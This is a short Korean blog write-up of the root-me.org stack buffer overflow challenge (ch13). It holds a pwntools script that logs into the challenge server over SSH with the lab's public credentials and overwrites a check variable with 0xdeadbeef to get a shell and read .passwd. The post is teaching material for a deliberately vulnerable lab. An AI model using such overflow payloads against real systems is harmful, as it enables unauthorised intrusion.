이번 문제는 root-me.org 의 system 첫 문제인 stack-buffer-overflow이다. 이 사이트는 기술을 익히기에 좋은 워게임 사이트인거 같다.
접속 정보를 제공한다.
접속을 해서 보면 Mitigation 상태를 보여주고 파일들이 보이는데 소스 코드를 제공한다. 소스 코드는 문제 사이트에도 있다.
check가 0xdeadbeef면 쉘을 획득할 수 있다.
buf의 시작주소 부터 check까지의 거리는 0x28이다. 이제 check를 0xdeadbeef도 덮어보자.
from pwn import *
user = 'app-systeme-ch13'
host = 'challenge02.root-me.org'
port = 2222
password = 'app-systeme-ch13'
s = ssh(user, host, port, password)
p = s.process('./ch13')
payload = 'A'*40
payload += p32(0xdeadbeef)
p.sendline(payload)
p.interactive()
ls -al 명령어로 보면 .passwd가 있다 확인해보니 값이 나온다.
'Wargame > Root-me' 카테고리의 다른 글
ELF x64 - Stack buffer overflow - PIE (0) | 2021.03.28 |
---|---|
ELF x86 - Stack buffer overflow basic 3 (0) | 2021.03.28 |
ELF x64 - Stack buffer overflow - basic (0) | 2021.03.28 |
ELF x86 - Format string bug basic 1 (0) | 2021.03.27 |
ELF x86 - Stack buffer overflow basic 2 (0) | 2021.03.27 |
댓글